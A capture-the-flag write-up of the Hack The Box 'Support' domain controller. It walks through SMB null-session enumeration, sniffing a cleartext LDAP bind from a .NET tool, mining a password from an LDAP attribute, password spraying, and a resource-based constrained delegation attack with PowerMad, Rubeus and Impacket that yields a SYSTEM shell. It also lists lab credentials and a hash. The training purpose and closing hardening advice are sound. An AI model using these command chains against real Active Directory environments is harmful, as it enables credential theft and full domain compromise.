PLEASE CHECK OUT MY NEW SITE WHERE I HOST MY WRITEUPS https://daemon-sec.xyz/post/htb-support
███████╗██╗ ██╗██████╗ ██████╗ ██████╗ ██████╗ ████████╗
██╔════╝██║ ██║██╔══██╗██╔══██╗██╔═══██╗██╔══██╗╚══██╔══╝
███████╗██║ ██║██████╔╝██████╔╝██║ ██║██████╔╝ ██║
╚════██║██║ ██║██╔═══╝ ██╔═══╝ ██║ ██║██╔══██╗ ██║
███████║╚██████╔╝██║ ██║ ╚██████╔╝██║ ██║ ██║
╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝
┌──────────────────────────────────────────────────────────────────────────────┐
│░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░│
│░ ▄▄▄ ▄████▄ ▄▄▄█████▓ ██▓ ██▒ █▓▓█████ ▓█████▄ ██▓ ██▀███ ░│
│░ ▒████▄ ▒██▀ ▀█ ▓ ██▒ ▓▒▓██▒▓██░ █▒▓█ ▀ ▒██▀ ██▌▓██▒▓██ ▒ ██▒ ░│
│░ ▒██ ▀█▄ ▒▓█ ▄ ▒ ▓██░ ▒░▒██▒ ▓██ █▒░▒███ ░██ █▌▒██▒▓██ ░▄█ ▒ ░│
│░ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒░ ▓██▓ ░ ░██░ ▒██ █░░▒▓█ ▄ ░▓█▄ ▌░██░▒██▀▀█▄ ░│
│░ ▓█ ▓██▒▒ ▓███▀ ░ ▒██▒ ░ ░██░ ▒▀█░ ░▒████▒ ░▒████▓ ░██░░██▓ ▒██▒ ░│
│░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░ ░▓ ░ ▐░ ░░ ▒░ ░ ▒▒▓ ▒ ░▓ ░ ▒▓ ░▒▓░ ░│
│░ ▒ ▒▒ ░ ░ ▒ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ▒ ▒ ▒ ░ ░▒ ░ ▒░ ░│
│░ ░ ▒ ░ ░ ▒ ░ ░░ ░ ░ ░ ░ ▒ ░ ░░ ░ ░│
│░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░│
│░ ░ ░ ░ ░│
│░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░│
│ E X P L O I T A T I O N // A C T I V E D I R E C T O R Y │
└──────────────────────────────────────────────────────────────────────────────┘
╔══════════════════════════════════════════════════════════════════════════════════╗
║ ATTACK VECTORS ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ [+] SMB Null Session Share Enumeration ║
║ [+] .NET Binary Traffic Analysis (Credential Interception) ║
║ [+] LDAP Attribute Mining (Password in Info Field) ║
║ [+] Password Spraying Attack ║
║ [+] BloodHound Attack Path Analysis ║
║ [+] Resource-Based Constrained Delegation (RBCD) ║
╚══════════════════════════════════════════════════════════════════════════════════╝
- >_ TARGET ACQUISITION
- >_ INITIAL RECONNAISSANCE
- >_ SMB ENUMERATION
- >_ BINARY ANALYSIS // USERINFO.EXE
- >_ CREDENTIAL INTERCEPTION
- >_ FOOTHOLD // LDAP ENUMERATION
- >_ PASSWORD SPRAYING
- >_ BLOODHOUND ANALYSIS
- >_ PRIVILEGE ESCALATION // RBCD ATTACK
- >_ SYSTEM ACCESS OBTAINED
- >_ CREDENTIALS VAULT
- >_ MITRE ATT&CK MAPPING
┌─────────────────────────────────────────────────────────────────────────────────┐
│ T A R G E T I N F I L T R A T I O N P A R A M E T E R S │
├─────────────────────────────────────────────────────────────────────────────────┤
│ IP ADDRESS........: 10.10.11.174 │
│ HOSTNAME..........: DC.support.htb │
│ DOMAIN............: support.htb │
│ OPERATING SYSTEM..: Windows Server 2022 Build 20348 │
│ DIFFICULTY........: Easy │
│ ATTACK SURFACE....: Active Directory Domain Controller │
│ KEY SERVICES......: LDAP, SMB, Kerberos, WinRM │
└─────────────────────────────────────────────────────────────────────────────────┘
The first phase of any engagement involves comprehensive port enumeration. Using RustScan for rapid port discovery combined with Nmap's service detection capabilities provides a complete picture of the target's attack surface.
rustscan -a $target --ulimit 5000 -r 1-65535 -- -sC -sV -Pn -oA Support_fullscanConverting results to HTML for easier analysis:
xsltproc Support_fullscan.xml -o Support_fullscan.htmlFigure 1: Nmap scan results revealing all open services on the Domain Controller
┌──────────────────────────────────────────────────────────────────────┐
│ KEY FINDINGS │
├──────────────────────────────────────────────────────────────────────┤
│ [+] Kerberos (88) - Confirms Active Directory environment │
│ [+] LDAP (389/636/3268/3269) - Directory enumeration vectors │
│ [+] SMB (445) - Potential file share access │
│ [+] WinRM (5985) - Remote shell capability if creds obtained │
│ [+] SMB Signing Required - Relay attacks mitigated │
│ [-] No Web Servers - Limits initial attack surface │
└──────────────────────────────────────────────────────────────────────┘
Critical Ports Identified:
| Port | Service | Significance |
|---|---|---|
| 53 | DNS | Domain name resolution for AD |
| 88 | Kerberos | Authentication service - ticket attacks possible |
| 389/636 | LDAP/LDAPS | Directory queries - user/group enumeration |
| 445 | SMB | File shares - potential data exfiltration |
| 5985 | WinRM | Remote PowerShell - shell access with valid creds |
Server Message Block (SMB) shares often contain valuable artifacts left behind by administrators or developers. Testing for null session access (anonymous authentication) is a critical first step.
smbclient -L \\\\10.10.11.174\\Figure 2: SMB share enumeration revealing accessible shares including
support-tools
The enumeration reveals a non-default share called support-tools which immediately warrants investigation. Standard shares like ADMIN$, C$, and IPC$ require elevated privileges, but custom shares often have relaxed permissions.
smbclient \\\\$target\\support-toolsFigure 3: Contents of the support-tools share containing various diagnostic utilities
╔══════════════════════════════════════════════════════════════════════════════════╗
║ ARTIFACT DISCOVERED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ FILE: UserInfo.exe.zip ║
║ TYPE: .NET Assembly (Mono/.NET compatible) ║
║ SIZE: 277,499 bytes ║
║ RISK: HIGH - Custom binary with potential hardcoded credentials ║
╚══════════════════════════════════════════════════════════════════════════════════╝
Downloading and extracting the suspicious binary:
smb: \> get UserInfo.exe.zipFigure 4: Extracted contents of UserInfo.exe.zip revealing .NET dependencies
Binary identification confirms .NET assembly:
file UserInfo.exe
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS WindowsBefore interacting with domain services, proper DNS resolution must be configured. NetExec can automatically populate the hosts file with discovered domain information.
sudo nxc smb $target --generate-hosts-file /etc/hostsSMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64
(name:DC) (domain:support.htb) (signing:True) (SMBv1:None) (Null Auth:True)
Figure 5: Hosts file updated with domain controller mapping
Since this is a .NET assembly, it can be executed on Linux using Wine or Mono. The binary appears to be a user lookup utility that queries the domain's LDAP directory.
Usage: UserInfo.exe [options] [commands]
Options:
-v|--verbose Verbose output
Commands:
find Find a user
user Get information about a userThe tool accepts wildcard queries, suggesting it performs LDAP searches against the domain controller. This behavior can be exploited to intercept authentication credentials.
wine UserInfo.exe -v find -first "*"
[*] LDAP query to use: (givenName=*)
[-] Exception: No Such ObjectThe query fails, but the verbose output confirms LDAP communication. The next step involves capturing the network traffic to analyze the authentication mechanism.
When applications authenticate to LDAP, credentials may be transmitted in cleartext (simple bind) or using SASL mechanisms. Capturing this traffic reveals the authentication method being used.
Starting packet capture on the VPN interface:
sudo tshark -i utun4 -w UserInfo.exe.pcapExecuting the binary to generate traffic:
wine UserInfo.exe find -first "administrator"Analyzing the captured packets:
tshark -r UserInfo.exe.pcapFigure 6: Tshark packet capture showing LDAP bind request with "simple" authentication
The capture reveals an LDAP simple bind operation, which transmits credentials in cleartext. Filtering for the bind request exposes the service account password.
tshark -r UserInfo.exe.pcap -Y "ldap.simple" -VFigure 7: LDAP simple bind credentials exposed in packet capture
╔══════════════════════════════════════════════════════════════════════════════════╗
║ CREDENTIAL INTERCEPTED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ BIND DN....: support\ldap ║
║ PASSWORD...: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz ║
║ AUTH TYPE..: Simple Bind (Cleartext) ║
║ PROTOCOL...: LDAP (Port 389, Unencrypted) ║
╚══════════════════════════════════════════════════════════════════════════════════╝
Before proceeding with enumeration, the captured credentials must be validated against the domain.
nxc smb support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64
(name:DC) (domain:support.htb) (signing:True) (SMBv1:None)
SMB 10.10.11.174 445 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
The [+] indicator confirms successful authentication. These credentials can now be leveraged for deep LDAP enumeration.
BloodHound is an essential tool for mapping Active Directory attack paths. It collects information about users, groups, computers, sessions, and ACLs to identify privilege escalation routes.
bloodhound-ce-python -c all -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
-d support.htb -ns $target --zip| Flag | Purpose |
|---|---|
-c all |
Collect all data types (users, groups, computers, sessions, ACLs) |
-u ldap |
Username for LDAP authentication |
-p '...' |
Password (note: special characters require quoting) |
-d support.htb |
Target domain |
-ns $target |
Nameserver IP for DNS resolution |
--zip |
Compress output for BloodHound import |
Figure 8: BloodHound-CE data collection successfully enumerating 21 users, 53 groups, and more
Administrators sometimes store sensitive information in LDAP attributes like description, info, or comment. A comprehensive LDAP dump can reveal these misconfigurations.
ldapsearch -LLL -x -H ldap://support.htb \
-D 'ldap@support.htb' \
-w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
-b "DC=support,DC=htb"This command dumps every object in the domain directory. To find passwords hidden in attributes, filter the output:
ldapsearch -LLL -x -H ldap://support.htb \
-D 'ldap@support.htb' \
-w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
-b "DC=support,DC=htb" | grep -i "info" -B 10Figure 9: LDAP search reveals password stored in the
infoattribute of user "support"
╔══════════════════════════════════════════════════════════════════════════════════╗
║ CREDENTIAL DISCOVERED IN LDAP ATTRIBUTE ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ USER DN.....: CN=support,CN=Users,DC=support,DC=htb ║
║ ATTRIBUTE...: info ║
║ VALUE.......: Ironside47pleasure40Watchful ║
║ RISK........: CRITICAL - Password stored in cleartext LDAP attribute ║
╚══════════════════════════════════════════════════════════════════════════════════╝
Before confirming which account uses the discovered password, extract a complete list of domain users.
nxc ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
--users --users-export users.txtFigure 10: Domain user list extracted via LDAP enumeration
Password spraying tests a single password against multiple accounts. This technique avoids account lockouts while identifying reused credentials.
nxc smb support.htb -u users.txt -p 'Ironside47pleasure40Watchful' --continue-on-successFigure 11: Password spray identifies "support" as the account using the discovered password
Alternative validation using Kerbrute:
kerbrute -domain support.htb -dc-ip $target -users users.txt \
-password Ironside47pleasure40WatchfulFigure 12: Kerbrute validates the credential against Kerberos authentication
╔══════════════════════════════════════════════════════════════════════════════════╗
║ VALID CREDENTIAL CONFIRMED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ USERNAME: support ║
║ PASSWORD: Ironside47pleasure40Watchful ║
║ ACCESS..: Remote Management Users (WinRM enabled) ║
╚══════════════════════════════════════════════════════════════════════════════════╝
With valid credentials for the support user, mark this principal as "Owned" in BloodHound to analyze attack paths from this position.
Figure 13: Marking the support user as owned in BloodHound-CE
BloodHound reveals that the support user is a member of Shared Support Accounts, which has GenericAll permissions over the Domain Controller computer object. This permission allows modification of critical attributes including Resource-Based Constrained Delegation (RBCD).
Figure 14: Windows-based RBCD abuse path via PowerMad and Rubeus
Figure 15: Linux-based RBCD abuse path via Impacket tools
┌──────────────────────────────────────────────────────────────────────┐
│ ATTACK PATH IDENTIFIED │
├──────────────────────────────────────────────────────────────────────┤
│ support@SUPPORT.HTB │
│ │ │
│ └──[MemberOf]──> SHARED SUPPORT ACCOUNTS@SUPPORT.HTB │
│ │ │
│ └──[GenericAll]──> DC.SUPPORT.HTB │
│ │ │
│ └──> RBCD Abuse │
└──────────────────────────────────────────────────────────────────────┘
RBCD allows a computer to specify which accounts can impersonate users to it via Kerberos delegation. With GenericAll over a computer object, an attacker can:
- Create a new machine account (or use an existing controlled account)
- Modify the target's
msDS-AllowedToActOnBehalfOfOtherIdentityattribute - Request a service ticket impersonating any user to the target
evil-winrm -i $target -u support -p Ironside47pleasure40WatchfulActive Directory allows regular users to create up to 10 machine accounts by default. This is controlled by the ms-DS-MachineAccountQuota attribute.
Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuotaFigure 16: Machine account quota check shows default value of 10
Before configuring delegation, confirm the target attribute is not already set.
Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentityFigure 17: RBCD attribute is empty - ready for abuse
upload PowerView.ps1
. ./PowerView.ps1
upload Powermad.ps1
. ./Powermad.ps1
upload Rubeus.exeUsing PowerMad, create a new machine account that will be granted delegation privileges.
New-MachineAccount -MachineAccount FAKE-COMP02 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)Verify creation:
Get-ADComputer -identity FAKE-COMP02Figure 18: Fake computer account successfully created in Active Directory
Set the Domain Controller to trust our fake computer for delegation.
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP02$Verify configuration:
Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccountFigure 19: DC now trusts FAKE-COMP02 for delegation
Confirm via PowerView:
Get-DomainComputer DC | select msds-allowedtoactonbehalfofotheridentityFigure 20: RBCD attribute populated with security descriptor
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor
$Descriptor.DiscretionaryAclFigure 21: Security descriptor confirms FAKE-COMP02's SID has delegation rights
Rubeus requires the machine account's password hash for S4U operations.
.\Rubeus.exe hash /password:Password123 /user:FAKE-COMP02$ /domain:support.htbFigure 22: Rubeus generates RC4 HMAC hash for the fake computer account
╔══════════════════════════════════════════════════════════════════════════════════╗
║ HASH GENERATED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ ACCOUNT...: FAKE-COMP02$ ║
║ RC4_HMAC..: 58A478135A93AC3BF058A5EA0E8FDB71 ║
╚══════════════════════════════════════════════════════════════════════════════════╝
Execute the S4U (Service for User) attack to obtain a ticket for Administrator.
.\Rubeus.exe s4u /user:FAKE-COMP02$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 \
/impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /pttRubeus Output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: S4U
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'support.htb\FAKE-COMP02$'
[+] TGT request successful!
[*] Building S4U2self request for: 'FAKE-COMP02$@SUPPORT.HTB'
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'FAKE-COMP02$@SUPPORT.HTB'
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[+] S4U2proxy success!
[+] Ticket successfully imported!
Figure 23: Base64-encoded Kerberos ticket for Administrator impersonation
Copy the base64 ticket and convert it for use with Impacket.
cat << EOF > ticket.kirbi.b64
[BASE64_TICKET_DATA]
EOFRemove whitespace and decode:
cat ticket.kirbi.b64 | tr -d ' \n' | base64 -d > ticket.kirbiConvert to ccache format:
ticketConverter.py ticket.kirbi ticket.ccacheExport for Impacket:
export KRB5CCNAME=ticket.ccacheWith the Administrator's service ticket, authenticate to the Domain Controller without knowing the password.
psexec.py -k -no-pass administrator@dc.support.htbFigure 24: SYSTEM shell obtained via Kerberos authentication - Box Pwned!
╔═══════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ███████╗██╗ ██╗███████╗████████╗███████╗███╗ ███╗ ║
║ ██╔════╝╚██╗ ██╔╝██╔════╝╚══██╔══╝██╔════╝████╗ ████║ ║
║ ███████╗ ╚████╔╝ ███████╗ ██║ █████╗ ██╔████╔██║ ║
║ ╚════██║ ╚██╔╝ ╚════██║ ██║ ██╔══╝ ██║╚██╔╝██║ ║
║ ███████║ ██║ ███████║ ██║ ███████╗██║ ╚═╝ ██║ ║
║ ╚══════╝ ╚═╝ ╚══════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ║
║ ║
║ C:\Windows\system32> whoami ║
║ nt authority\system ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ EXFILTRATED CREDENTIALS ║
╠════════════╦══════════════════╦════════════════════════════════════════════╦═══════════════════════════════╣
║ TYPE ║ USERNAME ║ PASSWORD / HASH ║ SOURCE ║
╠════════════╬══════════════════╬════════════════════════════════════════════╬═══════════════════════════════╣
║ LDAP ║ ldap ║ nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz ║ UserInfo.exe Traffic Capture ║
║ Domain ║ support ║ Ironside47pleasure40Watchful ║ LDAP info Attribute ║
║ Machine ║ FAKE-COMP02$ ║ Password123 ║ Created for RBCD Attack ║
║ Hash ║ FAKE-COMP02$ ║ 58A478135A93AC3BF058A5EA0E8FDB71 (RC4) ║ Rubeus Hash Generation ║
╚════════════╩══════════════════╩════════════════════════════════════════════╩═══════════════════════════════╝
╔═══════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██╗ ██╗███████╗███████╗██████╗ ███████╗██╗ █████╗ ██████╗ ║
║ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██╔════╝██║ ██╔══██╗██╔════╝ ║
║ ██║ ██║███████╗█████╗ ██████╔╝ █████╗ ██║ ███████║██║ ███╗ ║
║ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ██╔══╝ ██║ ██╔══██║██║ ██║ ║
║ ╚██████╔╝███████║███████╗██║ ██║ ██║ ███████╗██║ ██║╚██████╔╝ ║
║ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ║
║ ║
║ LOCATION: C:\Users\support\Desktop\user.txt ║
║ FLAG: HTB{********_REDACTED_********} ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
╔═══════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗ ██████╗ ██████╗ ████████╗ ███████╗██╗ █████╗ ██████╗ ║
║ ██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝ ██╔════╝██║ ██╔══██╗██╔════╝ ║
║ ██████╔╝██║ ██║██║ ██║ ██║ █████╗ ██║ ███████║██║ ███╗ ║
║ ██╔══██╗██║ ██║██║ ██║ ██║ ██╔══╝ ██║ ██╔══██║██║ ██║ ║
║ ██║ ██║╚██████╔╝╚██████╔╝ ██║ ██║ ███████╗██║ ██║╚██████╔╝ ║
║ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝ ║
║ ║
║ LOCATION: C:\Users\Administrator\Desktop\root.txt ║
║ FLAG: HTB{********_REDACTED_********} ║
║ ║
╚═══════════════════════════════════════════════════════════════════════════════════╝
| Tactic | Technique ID | Technique Name | Implementation |
|---|---|---|---|
| Reconnaissance | T1595.002 | Active Scanning: Vulnerability Scanning | RustScan + Nmap service enumeration |
| Resource Development | T1587.001 | Develop Capabilities: Malware | Fake computer account creation |
| Initial Access | T1078.002 | Valid Accounts: Domain Accounts | Credentials from UserInfo.exe traffic |
| Credential Access | T1040 | Network Sniffing | Tshark LDAP simple bind capture |
| Credential Access | T1552.001 | Unsecured Credentials: Credentials in Files | Password in LDAP info attribute |
| Credential Access | T1110.003 | Brute Force: Password Spraying | NetExec password spray attack |
| Discovery | T1087.002 | Account Discovery: Domain Account | BloodHound + LDAP user enumeration |
| Discovery | T1069.002 | Permission Groups Discovery | BloodHound ACL analysis |
| Lateral Movement | T1021.006 | Remote Services: Windows Remote Management | Evil-WinRM shell access |
| Privilege Escalation | T1134.001 | Access Token Manipulation | RBCD with S4U2Self/S4U2Proxy |
| Defense Evasion | T1550.003 | Use Alternate Authentication Material | Kerberos ticket impersonation |
┌──────────────────────────────────────────────────────────────────────────────────┐
│ SECURITY RECOMMENDATIONS │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ [1] LDAP Channel Binding & Signing │
│ - Enforce LDAP signing to prevent cleartext credential interception │
│ - Enable channel binding for LDAPS connections │
│ │
│ [2] Credential Hygiene │
│ - Never store passwords in LDAP attributes (info, description, etc.) │
│ - Implement regular password audits using tools like DSInternals │
│ │
│ [3] Machine Account Quota │
│ - Set ms-DS-MachineAccountQuota to 0 for non-admin users │
│ - Monitor for unexpected computer account creation │
│ │
│ [4] Delegation Controls │
│ - Mark sensitive accounts as "Account is sensitive, cannot be delegated" │
│ - Add Administrators to Protected Users group │
│ - Monitor changes to msDS-AllowedToActOnBehalfOfOtherIdentity │
│ │
│ [5] SMB Share Permissions │
│ - Disable null session access to shares │
│ - Audit custom shares for sensitive content │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────┐
│ HOW TO FIND EXPLOITS & POC SCRIPTS │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ [1] IDENTIFY VERSION │
│ ▸ Use nmap, nxc to fingerprint OS and services │
│ ▸ Check LDAP/SMB banners for Windows version │
│ ▸ Example: Windows Server 2022 Build 20348 │
│ │
│ [2] SEARCH EXPLOIT-DB / SEARCHSPLOIT │
│ ▸ searchsploit windows server 2022 │
│ ▸ searchsploit ldap │
│ ▸ searchsploit "constrained delegation" │
│ ▸ https://www.exploit-db.com/ │
│ │
│ [3] SEARCH CVE DATABASES │
│ ▸ https://nvd.nist.gov/ (NIST National Vulnerability Database) │
│ ▸ https://cve.mitre.org/ (CVE List) │
│ ▸ https://msrc.microsoft.com/ (Microsoft Security Response Center) │
│ │
│ [4] GITHUB POC REPOSITORIES │
│ ▸ https://github.com/fortra/impacket (Impacket - AD attacks) │
│ ▸ https://github.com/GhostPack/Rubeus (Kerberos attacks) │
│ ▸ https://github.com/Kevin-Robertson/Powermad (Machine account creation) │
│ ▸ https://github.com/PowerShellMafia/PowerSploit (PowerView) │
│ ▸ https://github.com/nomi-sec/PoC-in-GitHub (PoC aggregator) │
│ │
│ [5] ACTIVE DIRECTORY RESOURCES │
│ ▸ https://book.hacktricks.xyz/windows-hardening/active-directory-methodology │
│ ▸ https://adsecurity.org/ (AD Security Blog) │
│ ▸ https://www.thehacker.recipes/ (AD Attack Recipes) │
│ │
│ [6] SECURITY RESEARCH RESOURCES │
│ ▸ https://github.com/swisskyrepo/PayloadsAllTheThings │
│ ▸ https://www.ired.team/ (Red Team Notes) │
│ ▸ https://posts.specterops.io/ (SpecterOps Blog - BloodHound creators) │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────┐
│ VULNERABILITIES IN THIS BOX - SEARCH QUERIES │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ SMB Null Session (T1021.002) │
│ ▸ Tools: smbclient, nxc, enum4linux │
│ ▸ "SMB null session enumeration" │
│ │
│ LDAP Simple Bind - Credential Sniffing (T1040) │
│ ▸ Tools: tshark, Wireshark │
│ ▸ Filter: ldap.simple │
│ ▸ "LDAP cleartext credentials simple bind" │
│ │
│ Password in LDAP Attribute (T1552.001) │
│ ▸ Tool: ldapsearch │
│ ▸ "password stored in ldap description info attribute" │
│ ▸ Check: info, description, comment attributes │
│ │
│ GenericAll ACL Abuse │
│ ▸ Tool: BloodHound │
│ ▸ "GenericAll privilege escalation active directory" │
│ ▸ https://bloodhound.readthedocs.io/ │
│ │
│ Resource-Based Constrained Delegation (RBCD) │
│ ▸ Tools: Rubeus, rbcd.py (Impacket), PowerMad │
│ ▸ "RBCD attack msDS-AllowedToActOnBehalfOfOtherIdentity" │
│ ▸ https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd │
│ ▸ S4U2Self / S4U2Proxy attack chain │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
╔══════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ░█▀▀░█░█░█▀▀░▀█▀░█▀▀░█▄█░░░█▀▀░█▀█░█▄█░█▀█░█▀▄░█▀█░█▄█░▀█▀░█▀▀░█▀▀░█▀▄ ║
║ ░▀▀█░░█░░▀▀█░░█░░█▀▀░█░█░░░█░░░█░█░█░█░█▀▀░█▀▄░█░█░█░█░░█░░▀▀█░█▀▀░█░█ ║
║ ░▀▀▀░░▀░░▀▀▀░░▀░░▀▀▀░▀░▀░░░▀▀▀░▀▀▀░▀░▀░▀░░░▀░▀░▀▀▀░▀░▀░▀▀▀░▀▀▀░▀▀▀░▀▀░ ║
║ ║
║ WRITEUP AUTHOR: Netrunner ║
║ COMPLETION DATE: 2026-01-09 ║
║ ATTACK CHAIN: SMB > Traffic Analysis > LDAP Mining > RBCD > SYSTEM ║
║ ║
╚══════════════════════════════════════════════════════════════════════════════════════╝
